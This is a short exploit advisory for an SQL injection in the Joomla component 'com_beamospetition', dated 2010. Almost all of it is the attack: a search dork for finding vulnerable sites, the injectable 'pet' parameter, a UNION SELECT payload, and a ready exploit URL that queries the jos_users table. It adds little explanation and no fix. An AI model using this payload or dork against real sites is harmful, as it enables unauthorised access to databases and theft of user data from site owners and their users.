# Exploit Title : Joomla "com_beamospetition" Sql Injection Vulnerability # Date : 29 - 7 - 2010 # Author : Forza-Dz # Vendor : http://code.joomla.org/gf/project/beamospetition/frs/ # Version : All Versions # Tested on : Win Sp2 and Mc ############################################################ Dork = inurl:"com_beamospetition" ############################################################ --- SQL Injection Vulenrability --- SQL Injection Vulenrability component "com_beamospetition" http://www.site.com/path/index.php?option=com_beamospetition&startpage=3&pet=1[SQL] ############################################################ ===[Injection]=== [SQL] = +Union+select+1-- ############################################################ ===[ Exploit ]=== http://www.site.com/path/index.php?option=com_beamospetition&startpage=3&pet=-1 +Union+select+user()+from+jos_users-- ############################################################ Greetz @ Flit0x-Dz AnD MCA-CRB All "DZ" "MusliM" ############################################################